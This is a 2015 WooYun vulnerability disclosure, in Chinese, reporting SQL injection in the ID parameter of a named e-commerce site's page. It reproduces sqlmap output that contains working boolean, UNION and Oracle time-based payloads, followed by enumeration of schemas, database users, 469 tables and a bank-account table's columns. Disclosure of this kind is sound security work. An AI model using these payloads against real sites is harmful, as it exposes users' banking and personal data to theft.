当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142233

漏洞标题:货栈网SQL注入漏洞可泄露大量重要信息(用户信息/供应商信息/门店信息等)

相关厂商:货栈网

漏洞作者: 路人甲

提交时间:2015-09-20 10:02

修复时间:2015-11-04 10:04

公开时间:2015-11-04 10:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

货栈网SQL注入漏洞,泄露大量重要信息(用户信息/供应商信息/门店信息等)

详细说明:

直接暴露用户银行卡重要信息,以及供应商信息和门店信息。。。。。。。。。。
链接:http://www.huozhan.com/ArticlesAction_detail.do?ID=187

sqlmap identified the following injection points with a total of 0 HTTP(s) 
reque
sts:
---
Place: GET
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=187 AND 3926=3926
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: ID=-9116 UNION ALL SELECT NULL,CHR(58)||CHR(102)||CHR(106)||
CHR(109
)||CHR(58)||CHR(97)||CHR(82)||CHR(74)||CHR(75)||CHR(71)||CHR(103)||CHR
(72)||CHR(
88)||CHR(117)||CHR(72)||CHR(58)||CHR(119)||CHR(117)||CHR(104)||CHR
(58),NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: ID=187 AND 2947=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR
(70)||CHR(69
)||CHR(89),5)
---
[15:45:04] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[15:45:04] [WARNING] schema names are going to be used on Oracle for 
enumeration
 as the counterpart to database names on other DBMSes
[15:45:04] [INFO] fetching database (schema) names
[15:45:05] [INFO] the SQL query used returns 7 entries
[15:45:05] [INFO] retrieved: "HRZMART"
[15:45:05] [INFO] retrieved: "HUOZHAN"
[15:45:06] [INFO] retrieved: "OUTLN"
[15:45:06] [INFO] retrieved: "SHOP"
[15:45:06] [INFO] retrieved: "SYS"
[15:45:06] [INFO] retrieved: "SYSTEM"
[15:45:07] [INFO] retrieved: "WMSYS"
available databases [7]:
[*] HRZMART
[*] HUOZHAN
[*] OUTLN
[*] SHOP
[*] SYS
[*] SYSTEM
[*] WMSYS
fetching current user
current user:    'HUOZHAN'
current schema (equivalent to database on Oracle):    'HUOZHAN'
database management system users [15]:
[*] AK
[*] DBSNMP
[*] GAOZHAN
[*] HRZMAR
[*] HRZMART
[*] HUOZHAN
[*] HUOZHANCREA
[*] HUOZHANMODI
[*] HUOZHANSELE
[*] OUTLN
[*] SHOP
[*] SYS
[*] SYSTEM
[*] WMSYS
[*] ZWELL


2.png


3.png


4.png


5.png


漏洞证明:

多达469个表,包括各种重要信息。。。

web application technology: Nginx, JSP
back-end DBMS: Oracle
Database: HUOZHAN
[469 tables]
+--------------------------------+
| A                              |
| AAAA12                         |
| ABA                            |
| ABC                            |
| ABCD                           |
| ADDRESS_INFO                   |
| ADMIN_USER                     |
| AREA_BAR_CODE                  |
| AREA_BRAND                     |
| AREA_CATEGORY                  |
| AREA_INFO                      |
| AREA_ITEM                      |
| AREA_ITEM_CATEGORY             |
| AREA_VIP                       |
| AREA_VIP_CATEGORY              |
| AREA_VIP_ITEM                  |
| AREA_VIP_STORE                 |
| ARTICLE                        |
| ARTICLE_CATEGORY               |
| ATW0614                        |
| ATW0614_2                      |
| ATW09                          |
| AUTH                           |
| AUTHUSER_0801                  |
| AUTH_BAK                       |
| AUTH_CHILD_ROLE                |
| AUTH_CHILD_ROLE_ACCESS         |
| AUTH_ROLE                      |
| AUTH_ROLE_ACCESS               |
| AUTH_ROLE_ACCESSBAK            |
| AUTH_ROLE_ACCESS_1             |
| AUTH_USER                      |
| AUTH_USER_BAK                  |
| AUTH_USER_CHILD_ROLE           |
| AUTH_USER_MSG                  |
| AUTH_USER_ROLE                 |
| AUUSER0709                     |
| BALANCE_TABLE                  |
| BANK_BILL_RECORD               |
| BANK_CODE                      |
| BANK_PAY_ACCOUNT               |
| BANK_PAY_LOG                   |
| BF_0831_DRX                    |
| BILL_DETAIL                    |
| BILL_ITEM                      |
| BILL_ORDER                     |
| BILL_SUPPLIER_RATE             |
| BILL_SUPPLIER_RATE_TEMP        |
| BILL_SYS_RATE                  |
| BRAND                          |
| BUSINESS_COMMENTS              |
| BUSS_COMPANY                   |
| BUSS_EXTR_TOTAL                |
| BUSS_MONEY                     |
| CARD_ACCOUNT_REPORT            |
| CATEGORY_BRAND                 |
| CHILD_USER_INFO                |
| CITY                           |
| CK1320                         |
| CKCX                           |
| CKCX2                          |
| CLIENT_MEMBER_SHOP             |
| CLIENT_ORDERS_TEMP             |
| CONTRACT                       |
| CREDENTIAL_INFO                |
| CZ_0914FE                      |
| DAY_CATEGORY_BILL_SUMMARY      |
| DAY_ITEM_BILL_SUMMARY          |
| DAY_ITEM_BILL_SUMMARY_TEMP     |
| DAY_LOGISTICS_ACHIEVEMENT      |
| DAY_LOGISTICS_ACHIEVEMENT_TEMP |
| DAY_SETTLEMNET_LOG             |
| DAY_STORE_BILL_SUMMARY         |
| DAY_STORE_MONEY                |
| DAY_SUPPLIER_BILL_SUMMARY      |
| DAY_SUPPLIER_MEMBER_SUMMARY    |
| DESK_ANNOUNCE                  |
| DIRECT_SUPPLY_SHOW             |
| DLA_OLD                        |
| ET_OTP_PROD                    |
| ET_OTP_RECORD                  |
| ET_OTP_USER                    |
| FANKUAN_TW                     |
| FC1320                         |
| FCCX                           |
| FCCX2                          |
| FINANCE_PARAM_SET              |
| GAOZHAN_TEST                   |
| GATHER_LOG                     |
| GG_0607                        |
| GIFT_ITEM_DAY_SETTLEMNET       |
| GIFT_ITEM_IN                   |
| GIFT_ITEM_IN_DETAIL            |
| GIFT_ITEM_OUT                  |
| GIFT_ITEM_OUT_DETAIL           |
| GIFT_ITEM_RETURN               |
| GIFT_ITEM_RETURN_DETAIL        |
| GIFT_ITEM_STORE_DETAIL         |
| HRZPAY_ARTICLE                 |
| HRZPAY_ARTICLE_CATEGORY        |
| HRZ_P0811                      |
| HRZ_PAY_USER                   |
| HRZ_WORK                       |
| HRZ_WORK_USER                  |
| HUOZHAN_ADVERTISE              |
| HZ_MESSAGE                     |
| HZ_NEWS                        |
| HZ_NEWS_SORT                   |
| INVENTORY                      |
| INVENTORY_CHANGE_DETAIL        |
| INVENTORY_CHANGE_TOTAL         |
| INVENTORY_DETAIL               |
| INVENTORY_JOURNAL              |
| ITEM_CATEGORY                  |
| ITEM_DAY_DETAILS               |
| ITEM_DAY_SETTLEMNET            |
| ITEM_DAY_SETTLEMNET_TEMP       |
| ITEM_PLU_CODE                  |
| ITEM_ROOM                      |
| ITEM_TEMP                      |
| ITW0906                        |
| JXYF_PHONE_PROD                |
| JXYF_PHONE_RECORD              |
| JXYF_QQ_PROD                   |
| JXYF_QQ_RECORD                 |
| KC2012120211                   |
| KCSUP_ITEM                     |
| KC_ITEM0718                    |
| LOGISTICS_FEE_TYPE             |
| LOGISTICS_FINANCE_TOTAL        |
| LOGISTICS_INFO                 |
| LOGISTICS_LINE                 |
| LOGISTICS_MONEY                |
| LOGISTICS_ORDER_OPER           |
| LOGISTICS_PINGJIA_MAN          |
| LOGISTICS_PINGJIA_TOTAL        |
| LOGISTICS_RECEIVE              |
| LOGISTICS_RECEIVE_DETAIL       |
| LOGISTICS_REQUEST              |
| LOGISTICS_REQUEST_DETAILS      |
| LOGISTICS_SENDOUT_DETAIL       |
| LOGISTICS_SENDOUT_TOTAL        |
| LOGISTICS_SERVICE_MAN          |
| LOGISTICS_TASK_FEE             |
| LOGISTICS_TASK_ORDER           |
| LOGISTICS_TASK_TOTAL           |
| LOGISTICS_TASK_USER            |
| LOGISTICS_USER                 |
| LOGISTICS_USER_CATEGORY        |
| LOGISTICS_USER_OPER            |
| LOGISTICS_USER_WORKREPORT      |
| LOGISTICS_VEHICLE              |
| LOVE_ITEM                      |
| MARKET_BILL_RECORD             |
| MARKET_BILL_RECORD_DETAIL      |
| MARKET_ENTRY                   |
| MARKET_ENTRY_CANCEL            |
| MARKET_ENTRY_CONTRACT          |
| MARKET_PAY                     |
| MARKET_USER_ACCOUNT            |
| MARKET_USER_ACCOUNT_RIGHT      |
| MEMBER_FEE                     |
| MEMBER_FEE_BAK                 |
| MEM_CARDSUM_TYPE               |
| MEM_CARD_INFO                  |
| MEM_CARD_INFO_BACK             |
| MEM_CARD_INFO_OLD              |
| MEM_CARD_INFO_TEMP             |
| MEM_CARD_SCORING_RECORD        |
| MEM_CARD_SCORING_STORE         |
| MEM_CARD_SCORING_TRADE         |
| MEM_CARD_TOTAL                 |
| MEM_CARD_TYPE                  |
| MEM_CONSUME_RECORD             |
| MEM_MEMBER_INFO                |
| MEM_PAY_MONEY                  |
| MM1_0823                       |
| MM_0823                        |
| NAMEQI0714                     |
| NEW_FLAG_ITEM                  |
| OPERATOR_STORE                 |
| ORDERDETAIL0709                |
| ORDERTOTAL0709                 |
| ORDER_CODE_1320                |
| PARAMETER_SET                  |
| PDA_INFO                       |
| PDA_JOURNAL                    |
| PDA_USER                       |
| PLAN_TABLE                     |
| PLU_CATEGORY                   |
| POVINCE                        |
| PROMOTION_DETAIL               |
| PROMOTION_PRESENT_DETAIL       |
| PROMOTION_PRESENT_TOTAL        |
| PROMOTION_TOTAL                |
| PUB_ITEM                       |
| PUB_ITEM_CATEGORY              |
| PUB_ITEM_OLDCATEGORY           |
| PURCHASER                      |
| QUEST_SOO_AT_APPNAME           |
| QUEST_SOO_AT_EXECUTION_PLAN    |
| QUEST_SOO_AT_OPERATIONS        |
| QUEST_SOO_AT_PARSE_CURSOR      |
| QUEST_SOO_AT_PARSE_ERROR       |
| QUEST_SOO_AT_PARSE_WAITS       |
| QUEST_SOO_AT_SESSION_ID        |
| QUEST_SOO_AT_SQL_BINDS         |
| QUEST_SOO_AT_SQL_EXECUTIONS    |
| QUEST_SOO_AT_SQL_EXEC_ERROR    |
| QUEST_SOO_AT_SQL_FETCH         |
| QUEST_SOO_AT_SQL_STATEMENT     |
| QUEST_SOO_AT_SQL_STMT_PIECES   |
| QUEST_SOO_AT_SQL_WAITS         |
| QUEST_SOO_AT_TRACE_FILE        |
| QUEST_SOO_AT_WAIT_NAMES        |
| QUEST_SOO_BUFFER_BUSY          |
| QUEST_SOO_EVENT_CATEGORIES     |
| QUEST_SOO_LOCK_TREE            |
| QUEST_SOO_PARSE_TIME_TRACK     |
| QUEST_SOO_PLAN_TABLE           |
| QUEST_SOO_SB_BUFFER_BUSY       |
| QUEST_SOO_SB_EVENT             |
| QUEST_SOO_SB_IO_STAT           |
| QUEST_SOO_SCHEMA_VERSIONS      |
| QUEST_SOO_VERSION              |
| REPORT_ARRIVAL_RATE            |
| REPORT_BRAND_TRANSACTION       |
| REPORT_CATEGORY_DAILY          |
| REPORT_CATEGORY_TRANSACTION    |
| REPORT_ITEM_CONSIGNMENT        |
| REPORT_ITEM_DAILY              |
| REPORT_STORE_ORDER_ALLOCATION  |
| REPORT_STORE_RECEIVE           |
| REPORT_STORE_TRANSACTION       |
| REPORT_SUPPLIER_OUT_STOCK      |
| RETAIL_PRODUCT                 |
| RK1320                         |
| RKCX                           |
| RKCX2                          |
| RR1SS                          |
| RR2SS                          |
| S1102_S                        |
| SCORE_INFO                     |
| SCORE_SET                      |
| SECOND_KILL_ITEM               |
| SECOND_KILL_USER               |
| SERVICE_MAN                    |
| SERVICE_MAN_FINANCE_TOTAL      |
| SERVICE_MAN_ITEM_CATEGORY      |
| SERVICE_MAN_RATE               |
| SFD_0810                       |
| SHOPITEM0709                   |
| SHOP_DAY_R_XS                  |
| SM0915_T                       |
| SOT20130118                    |
| SSD20130204                    |
| SSDTW0613                      |
| SSD_0830                       |
| SSS0530                        |
| ST020130205                    |
| ST0425TW_ART                   |
| STI_NULL_W0520                 |
| STOCK_AREA                     |
| STOCK_AREA_ITEM_CATEGORY       |
| STOCK_BAD_DETAIL               |
| STOCK_CHG_1008T                |
| STOCK_CHG_2132T                |
| STOCK_GIFT_ITEM                |
| STOCK_HISTORY_DAY              |
| STOCK_HONGCHONG_DETAIL         |
| STOCK_HONGCHONG_TOTAL          |
| STOCK_ITEM_ADJUST              |
| STOCK_LACK                     |
| STOCK_LOGS                     |
| STOCK_LOGS1101_                |
| STOCK_LOGS1101_MIN_ID          |
| STOCK_LOGS1101_NUM             |
| STOCK_LOGS1101_NUM_ALL         |
| STOCK_NORMAL_DETAIL            |
| STOCK_ROOM                     |
| STOCK_ROOM_EXCHANGE            |
| STOCK_ROOM_EXCHANGE_DETAIL     |
| STOCK_ROOM_ITEM                |
| STOCK_TOTAL                    |
| STOCK_TOTALCZ0718              |
| STOCK_TOTAL_BATCH              |
| STOCK_TOTAL_BATCH0901          |
| STOCK_TOTAL_BATCH_22           |
| STOCK_TOTAL_BATCH_823          |
| STOCK_TOTAL_BATCH_829          |
| STOCK_TOTAL_BATCH_CHG          |
| STOCK_TOTAL_BATCH_CHG0901      |
| STOCK_TOTAL_BATCH_CHG_823      |
| STOCK_TOTAL_BATCH_CHG_829      |
| STOCK_TOTAL_CHGAVG_LOG         |
| STOCK_TOTAL_DAHU               |
| STOCK_TOTAL_DAY                |
| STOCK_TOTAL_LOG                |
| STOCK_UNEQUAL_RECORD           |
| STORE                          |
| STORE1_AC_REPORJ0823           |
| STORE_ACCOUNT_DAY_REPORT       |
| STORE_ACCOUNT_REPORT           |
| STORE_AC_REPORJ0823            |
| STORE_CARDSALE_DETAIL          |
| STORE_FAVOR                    |
| STORE_HOMOLOGOUS               |
| STORE_HUOZHAN                  |
| STORE_ITEM_STOCK               |
| STORE_KEEP_MONEY               |
| STORE_MONEY                    |
| STORE_MONEY_CZ2                |
| STORE_MONEY_EXTR               |
| STORE_MONEY_TEMP               |
| STORE_MON_0816                 |
| STORE_ORDER_DETAIL             |
| STORE_ORDER_DIFF_DETAIL        |
| STORE_ORDER_DIFF_TOTAL         |
| STORE_ORDER_DIRECT             |
| STORE_ORDER_OVERING            |
| STORE_ORDER_SECONDKILL_DETAIL  |
| STORE_ORDER_STATUS             |
| STORE_ORDER_TEMP               |
| STORE_ORDER_TEMP_NULL          |
| STORE_ORDER_TOTAL              |
| STORE_ORDER_TOTAL_0317CZ2      |
| STORE_ORDER_TOTAL_ERRORBALANCE |
| STORE_PREPAID_MONEY            |
| STORE_PUB_ITEM                 |
| STORE_RECHARGEABLE             |
| STORE_RETURN_DETAIL            |
| STORE_RETURN_MONEY             |
| STORE_RETURN_TOTAL             |
| STORE_SELF_ITEM                |
| STORE_SENDOUT_DETAIL           |
| STORE_SEN_ITEM0614             |
| STORE_SEN_ITEM0614CD           |
| STORE_SORT                     |
| STORE_STORETYPE                |
| STORE_TRANSACTION_PRICE        |
| STORE_TYPE                     |
| STORE_TYPE_ITEM                |
| STORE_TYPE_ITEM_GIFT_DETAIL    |
| STORE_TYPE_ITEM_GIFT_TOTAL     |
| STORE_TYPE_ITEM_HIS            |
| STORE_TYPE_ITEM_NEW            |
| STORE_TYPE_ITEM_UPSHELF        |
| STORE_TYPE_ITE_20120502        |
| STORE_USER                     |
| SUB_AREA_INFO                  |
| SUB_AREA_ITEM                  |
| SUGGED_ITEM                    |
| SUM_0519W                      |
| SUPPLIER                       |
| SUPPLIER_ACCOUNT_DAY_RPT       |
| SUPPLIER_ACCOUNT_REPORT        |
| SUPPLIER_ADVERTISEMENT         |
| SUPPLIER_AREA_FEE              |
| SUPPLIER_BRAND                 |
| SUPPLIER_BRAND_TEMP            |
| SUPPLIER_CATEGORY              |
| SUPPLIER_CATEGORY_ALIAS        |
| SUPPLIER_CATEGORY_TEMP         |
| SUPPLIER_CHANGE_PRICE          |
| SUPPLIER_CHANGE_TOTAL          |
| SUPPLIER_CUSTOMERS             |
| SUPPLIER_DELIVERY              |
| SUPPLIER_DIRECT_OUT_DETAIL     |
| SUPPLIER_DIRECT_OUT_SUM_DETAIL |
| SUPPLIER_DIRECT_OUT_TOTAL      |
| SUPPLIER_FEE                   |
| SUPPLIER_FEE_DETAIL            |
| SUPPLIER_FEE_TOTAL             |
| SUPPLIER_FINANCE_DAY           |
| SUPPLIER_FINANCE_DETAIL        |
| SUPPLIER_FINANCE_DETAIL_0927   |
| SUPPLIER_FINANCE_DETAIL_CZ2    |
| SUPPLIER_FINANCE_TOTAL         |
| SUPPLIER_FINANCE_TOTAL_CZ2     |
| SUPPLIER_GETFEE_DETAIL         |
| SUPPLIER_GETFEE_TOTAL          |
| SUPPLIER_GETFEE_TYPE           |
| SUPPLIER_HUOZHAN               |
| SUPPLIER_ITEM                  |
| SUPPLIER_ITEM_FEE_DETAIL       |
| SUPPLIER_ITEM_FEE_TOTAL        |
| SUPPLIER_ITEM_IMG              |
| SUPPLIER_ITEM_PURCHASER        |
| SUPPLIER_KEEP_MONEY            |
| SUPPLIER_MEMBERS               |
| SUPPLIER_MEMBERS_EXTR          |
| SUPPLIER_MONEY                 |
| SUPPLIER_MONEY1026T            |
| SUPPLIER_MONEY1028             |
| SUPPLIER_MONEY_0205            |
| SUPPLIER_MONEY_0728            |
| SUPPLIER_MONEY_092311          |
| SUPPLIER_MONEY_092311A         |
| SUPPLIER_MONEY_1209            |
| SUPPLIER_MONEY_3111247         |
| SUPPLIER_MONEY_3170221         |
| SUPPLIER_MONEY_3171052         |
| SUPPLIER_MONEY_910TW           |
| SUPPLIER_MONEY_913TW           |
| SUPPLIER_MONEY_913TW2          |
| SUPPLIER_MONEY_99TW            |
| SUPPLIER_MONEY_BAK_60101       |
| SUPPLIER_MONEY_CZ2             |
| SUPPLIER_MONEY_NTW910          |
| SUPPLIER_MONEY_NTW99           |
| SUPPLIER_MONY010075            |
| SUPPLIER_NEW_FINDETAIL         |
| SUPPLIER_RECD_ITEM             |
| SUPPLIER_RETURN_DETAIL         |
| SUPPLIER_RETURN_TOTAL          |
| SUPPLIER_STAR                  |
| SUPPLIER_STOCK_MONEY           |
| SUPPLIER_STOCK_RECORD          |
| SUPPLIER_STORETYPE_ITEM        |
| SUPPLIER_STORETYPE_ITEM_LOG    |
| SUPPLIER_STORE_ACCPER          |
| SUPPLIER_STORE_DELIVERY        |
| SUPPLIER_STORE_PRICE           |
| SUPPLIER_STORE_PROXYITEM       |
| SUPPLIER_STORE_RECORD          |
| SUPPLIER_STORE_TYPE            |
| SUPPLIER_SUB_AREA              |
| SUPPLIER_USER                  |
| SUPP_ITEM_0822                 |
| SWAY_0711                      |
| SYSTEM_ARGS                    |
| SYSTEM_INFO                    |
| SYSTEM_JOBS                    |
| S_MONEY0804                    |
| TH1320                         |
| THCX                           |
| THCX2                          |
| THIRD_LOGISTICS_ITEM           |
| THIRD_LOGISTICS_ORDER          |
| THIRD_LOGISTICS_ORDER_DETAIL   |
| THIRD_LOGISTICS_ORDER_TOTAL    |
| TIMER_TEST                     |
| TMP_DAY_STORE_MONEY            |
| TOP_ITEM                       |
| TW0709                         |
| TW07092                        |
| TW0713                         |
| TW_120821                      |
| TW_120821AU                    |
| UNIT_TRANS                     |
| URLFILTER                      |
| USER_ACCESS_RECORD             |
| USER_BANK_ACCOUNT              |
| USER_DOMAIN                    |
| USER_OPER_LOG                  |
| USER_RECHARGE_ACCOUNT          |
| USER_RECHARGE_TYPE             |
| USER_SUGGEST                   |
| WEB_CHANGE_PRICE               |
| WEB_CHANGE_PRICE_DETAIL        |
| WEB_CHANGE_PRICE_TOTAL         |
| WORKER_ORDER                   |
| WORKER_WAREHOUSE               |
| XGSJ20130206                   |
| XIFEI_TW                       |
| YEE_BILL_RECORD                |
| YEE_BILL_RECORD_DETAIL         |
| YL_0519W                       |
| ZS_0831S                       |
+--------------------------------+
Database: HUOZHAN
Table: USER_BANK_ACCOUNT
[12 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| ACCOUNT_NO   | VARCHAR2 |
| ACCOUNT_PROP | CHAR     |
| ACCOUNT_TYPE | CHAR     |
| AREA_CODE    | VARCHAR2 |
| BANK_ADDRESS | VARCHAR2 |
| BANK_NAME    | VARCHAR2 |
| ID           | NUMBER   |
| STATUS       | CHAR     |
| USER_CODE    | VARCHAR2 |
| USER_ID      | NUMBER   |
| USER_NAME    | VARCHAR2 |
| USER_TYPE    | CHAR     |
+--------------+----------+


6.png


66.png


7.png


太多数据了 就不爆出来了。。。。。

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)